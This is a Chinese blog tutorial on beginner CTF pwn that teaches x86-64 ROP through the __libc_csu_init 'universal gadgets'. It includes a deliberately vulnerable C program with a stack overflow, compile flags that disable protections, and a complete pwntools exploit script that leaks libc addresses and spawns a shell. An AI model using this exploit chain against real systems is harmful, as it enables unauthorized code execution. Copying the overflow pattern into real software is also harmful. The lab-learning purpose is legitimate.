PWN入门之通用gadgets

最新推荐文章于 2024-05-27 19:13:50 发布
最新推荐文章于 2024-05-27 19:13:50 发布
阅读量2.7k 收藏 15
点赞数 1
文章标签: PWN入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681716/article/details/89057022
版权

实验目的

针对一些程序运行时的初始化函数(如加载libc.so的初始化函数),提取一些通用的gadgets,从而更利于我们继续ROP操作。

实验文件

这次实验的可执行文件文件通过我们自己编译一个程序产生,为了降低实验的难度,我们在进行编译的时候,关闭栈保护和数据执行保护(DEP)。

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 512);
}

int main(int argc, char** argv) {
    write(STDOUT_FILENO, "Hello, World\n", 13);
    vulnerable_function();
}

上面level5.c的代码。

gcc -fno-stack-protector -z execstack -o level5 level5.c

我们用上面level5.c进行编译生成可执行文件level5,-fno-stack-protector和-z execstack这两个参数会分别关掉DEP(数据执行保护)和Stack Protector(栈保护)。
在这里插入图片描述

实验步骤

首先对level5进行检测,看看有没有保护机制
在这里插入图片描述
发现堆栈是no canary found ,所以我们可以进行栈溢出。
对我们生成的level用IDA进行静态分析找出栈溢出点
在这里插入图片描述
利用gdb对level5进行动态调试,找出从输入点到ret地址,即我们需要填充的字符数。
在这里插入图片描述
我们需要填充的字符数为(0x80+0x08)(因为我们这次用的是64位不是32位)。
然后,我们使用ROPGadget搜索一下level5中所有pop ret的gadgets

ROPgadget --binary ./level5 --only "pop|ret"

在这里插入图片描述
虽然该实验我们还是利用上个实验中从libc表中查找system和bin/sh,原程序使用了write()和read()函数,我们可以通过write()去输出write.got的地址,从而计算出libc在内存中的地址。但是该执行文件是64位而不是32位,32位可以直接采用上个实验的方法。但是64位就不行?因为64位和32位的传参方式发生了改变 。因为64位下前6个参数不是保存在栈中,而是通过寄存器传值。

在这里我们分析一下32位与64位的不同?
1、32位程序使用栈传参。对于32位程序,逻辑地址是从0~2^32。
2、64位程序传前六个参数使用寄存器,之后所有参数使用栈传。对于64位程序,逻辑地址是从0~2^64。

因为32位与64位程序的不同,相应的ROP方式我们也进行了改变。在原来的32位程序中我们会直接将目标函数的入口地址和相应的参数放在payload中,最后进行rop时,参数是根据与ebp的相对位置来进行确定的。而在64位程序中,我们不仅要将目标函数的入口地址和相应参数放在payload中,同时还要插入一些gadget,将参数放入相应的寄存器中,从而达到传参的目的。

现在开始编写payload脚本

上面的elf.address是elf的基址,是通过IDA分析出来的

在这里插入图片描述
通过对IDA进行静态分析,我们在这里介绍一下通用的gadgets。
在这里插入图片描述
对上面的汇编代码进行分析,先分析6次pop的地方(我们不妨将6次pop的地址记为pop_6)

pop     rbx      //为了减小后面利用难度,将rbx取值为0
pop     rbp      //将rbp取值为1,通过检测,使检验避过。
pop     r12     //这里存放我们最后跳转目标函数地址
pop     r13    //传入第一个参数
pop     r14    //第二个参数
pop     r15  //第三个参数
retn

我们将6次pop中的ret的值设为下面汇编的地址(我们不妨将下面汇编的地址记为mov_3)

mov     rdx, r15
mov     rsi, r14
mov     edi, r13d
call    qword ptr [r12+rbx*8]
add     rbx, 1
cmp     rbp, rbx
jnz     short loc_5555555546F0

我们将r15的值赋值给rdx,,r14的值赋值给rsi,r13的值赋值给edi,随后就会调用call qword ptr [r12+rbx8]。这时候我们只要再将rbx的值赋值为0,再通过精心构造栈上的数据,我们就可以控制pc去调用我们想要调用的函数了(比如说write函数)。执行完call qword ptr [r12+rbx8]之后,程序会对rbx+=1,然后对比rbp和rbx的值,如果相等就会继续向下执行并ret到我们想要继续执行的地址。所以为了让rbp和rbx的值相等,我们可以将rbp的值设置为1,因为之前已经将rbx的值设置为0了。

所以payload为

payload = 'a'*0x88+p64(pop_6)
payload+=p64(0)+p64(1)+p64(elf.got['write'])+p64(8)+p64(elf.got['write'])+p64(1)
payload+=p64(mov_3)+'a'*(8*7)+p64(main)

write规定传入的第一个参数对应r13,在mov_3处是将r13给edi,所以传入泄露的字节数,只需要泄露8个字节即可。第二个参数对应r14,在mov_3处是将r14给rsi,为要泄露的位置,因为got表中存的是地址而plt表中存的是指令,无法进行call操作,所以第二个参数为write在got表中的地址。第三个参数对应r15,在mov_3处是将r15给rdx,所以第三个参数为1。a*(8*7),还是继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数,最后跳至main函数。

write=u64(p.recv(8).ljust(8,'\x00'))
print hex(write) 
libc=LibcSearcher('write',write)
libcbase=write-libc.dump('write')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')

我们通过write在内存上的地址,泄露出libc表的基址,最终泄露出system和bin_sh。

payload='a'*0x88+p64(0x0000000000400623+elf.address)+p64(bin_sh)+p64(system)

因为后面的输入点是以ebp为定位的,这与ret的位置的距离是固定的。然后需要传参,在64位上传参,我们传的第一个参数是rdi,但是在上面我们找到的gadgets是一个偏移量,所以还需要加上一个基址。所以用’a’进行覆盖栈后,将gadgets的值写入到ret位置,这样我们就能跳转至pop rdi;ret;地址处,先进行pop操作,把bin_sh给pop出来,赋给rdi。再进行ret操作,此时ret上的地址为system的地址,所以我们就能进行system(bin_sh)的操作。这样,我们就能getshell。
在这里插入图片描述

最后附上exp.py

#!python
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
p = process('./level5')
elf = ELF('./level5')
#p = remote('127.0.0.1',10001)
pop_6 = 0x000000000040061A
mov_3 = 0x0000000000400600
main = 0x0000000000400587
elf.address=0x0000000000400000
payload = 'a'*(0x80+0x08)+p64(pop_6)
payload += p64(0)+p64(1)+p64(elf.got['write'])+p64(8)+p64(elf.got['write'])+p64(1)
payload += p64(mov_3) + 'a'*(8*7)+p64(main)
#pwnlib.gdb.attach(p)
p.recvuntil("World\n")
p.sendline(payload)
write=u64(p.recv(8).ljust(8,'\x00'))
print hex(write) 
libc=LibcSearcher('write',write)
libcbase=write-libc.dump('write')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
payload='a'*0x88+p64(0x0000000000400623+elf.address)+p64(bin_sh)+p64(system)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()
'''0x000000000040061c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040061e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop r14 ; pop r15 ; ret
0x0000000000400622 : pop r15 ; ret
0x000000000040061b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040061f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004004d0 : pop rbp ; ret
0x0000000000400623 : pop rdi ; ret
0x0000000000400621 : pop rsi ; pop r15 ; ret
0x000000000040061d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400419 : ret
'''
Han&Joe
关注
  • 1
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pwn中的万能gadget函数
Assassin
04-08 649
pwn的过程中,有一些一般程序都有的万能gadget函数,特别时程序在初始化的时候一般会有下面函数,就为构造ROP链提供了原材料 _init _start call_gmon_start deregister_tm_clones register_tm_clones __do_global_dtors_aux frame_dummy __libc_csu_init __libc_csu_fini _fini _dl_runtime_resolve __libc_csu_init .text:000000
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1612
pwn练习1-ret2syscall(ROP-gadget)
PWn基本工具安装
最新发布
weixin_61804402的博客
05-27 212
main_arena_offset——一个简单的 shell 脚本,用于获取给定 libc 的偏移量。one_gadget ——一键找到 shell 地址。ROPgadget——ROP命令找到的gadget。checksec ——检测文件保护机制。LibcSearcher——代替。在github上克隆pwndbg。IDA Pro——静态代码分析。pwndbg——动态调试。
xnuca2018-pwn-0gadget
sunrise的博客
11-24 733
off-by-one double free,uaf fast-bin-attack 函数功能: add函数中有一个off-by-one溢出,可以修改下一个本数组的堆指针的最后一个字节,使其指向最后一字节为'\x00'的堆块 用off-by-one修改后,free这个unsortedbin堆块,然后显示其中的fd,得到libc基址 同理,用do...
PWN GADGET 入门
baidu_39617633的博客
09-25 891
PWN GADGET 入门 checksec ret2syscall 拖入相应的IDA 3. playload构造 漏洞点 gets() 无canary,开启栈保护(NX ENABLE),无法直接将shellcode写入栈,需要gadget 计算padding IDA反编译直接查看 距离ebp为0x64,根据返回地址在ebp下一个字长处,所以总padding为0x64+0x4 但是失败。IDA有坑! GDB查看栈 填充0x86个a 使用gdb.attach()下断点至g
RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]
ACdream
01-26 376
https://blog.csdn.net/u011987514/article/details/70232881 按照自己习惯,代码重写一下: #!/usr/bin/env python # coding=utf-8 from pwn import * io = process("./welpwn") #gadgets p4r = 0x40089C pr = 0x4008A3 mai...
[pwn]ROP:使用通用gadget
Breeze的博客
07-06 1万+
[详细] ROP:使用通用gadget 这次试用的是LCTF2016的试题pwn100,参考i春秋上的这篇文章 在这里详细讲解如何利用通用gadget构造一个复杂的ROP链。 通用gadget介绍 介绍一段通用gadget,通常出现在64elf位文件的__libc_csu_init函数中(截图来自本程序pwn100,很多64位二进制文件都有): 这其中有三段gadget,第一段是 pop ...
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
warmup pwn入门
02-11
pwn入门
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
pwn入门题目汇总.rar
09-01
本压缩包“pwn入门题目汇总.rar”显然是为初学者准备的一系列练习,旨在帮助他们了解和掌握pwn的基本概念和技术。 在学习pwn的过程中,首先需要理解的是计算机内存的工作原理,特别是栈、堆和全局变量的布局。栈是...
Pwn
bluestar628的博客
07-11 2465
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
CTF-PWN练习之通用跳转技术
ChuMeng1999的博客
01-06 2220
目录预备知识一、相关实验二、strdup函数三、grep命令实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之绕过返回地址限制》。 二、strdup函数 strdup可以用于复制一个字符串,我们通常使用字符串时会使用strcpy,这要求已经定义好了一个接收缓冲区。而strdup只接受一个参数,也就是要复制的字符串的地址,strdup()会先用malloc()配置与参数字符串相同大小的的空间,然后
自制python小工具(3)——Gadgets1.1
m0_70457107的博客
08-26 1082
Gadgets 1.1版本新鲜出炉,欢迎各位前来围观指教!
通用gadget详解
weixin_44932880的博客
12-26 7330
gadget 利用gadget是做pwn题时控制程序流程一种重要且常用的方法。 rop是什么? 参考链接 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/ 我今天主要写我对通用gadget的原理的理解 通用 gadget 通用gadget之所以叫通用,说明这是可以广泛使用的。 本人理解: 程序编译...
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1158
PWN
探秘安全领域利器:`ROPgadget` - 反向工程与漏洞利用的新工具
gitblog_00017的博客
03-22 278
探秘安全领域利器:ROPgadget - 反向工程与漏洞利用的新工具 项目地址:https://gitcode.com/JonathanSalwan/ROPgadget 项目简介 在网络安全的世界里,ROPgadget 是一个非常实用的开源工具,由 Jonathan Salwan 开发并托管在 GitCode 上。它主要用于分析二进制文件,搜索可用于 Return-Oriented Program...
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
热门推荐
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件中搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
ctfshow pwn入门
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目中,程序会读取系统中/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,我们需要先修改/proc/sys/kernel/randomize_va_space文件的内容为0,然后运行pwn文件,即可得到正确的flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值